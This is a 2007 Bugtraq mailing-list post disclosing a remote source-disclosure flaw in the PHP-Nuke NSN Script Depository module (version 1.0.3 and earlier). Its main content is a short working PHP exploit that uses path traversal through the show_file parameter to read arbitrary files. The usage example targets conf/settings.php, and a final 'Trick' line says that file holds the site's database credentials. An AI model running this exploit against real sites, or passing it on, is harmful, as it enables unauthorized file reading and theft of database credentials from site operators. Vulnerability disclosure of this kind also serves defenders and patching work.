Bugtraq mailing list archives
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure
From: kingoftheworld92 () fastwebnet it
Date: 26 Nov 2007 20:51:32 -0000
--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- Exploit <? /* Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file] Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php */ $targ = $_GET['targ']; $file = $_GET['file']; echo ' <form action="$targ/modules.php?name=Script_Depository" method="post"> <input name="show_file" value="/../../$file" type="hidden"> <input value="show_file" name="op" type="hidden"> <input type="submit" value="Show Source"> </form>'; ?> Trick In conf/settings.php there are the database credentials ;) ---------------------------------------------------------------
Current thread:
- PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure kingoftheworld92 (Nov 26)
- <Possible follow-ups>
- Re: PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure kingoftheworld92 (Nov 26)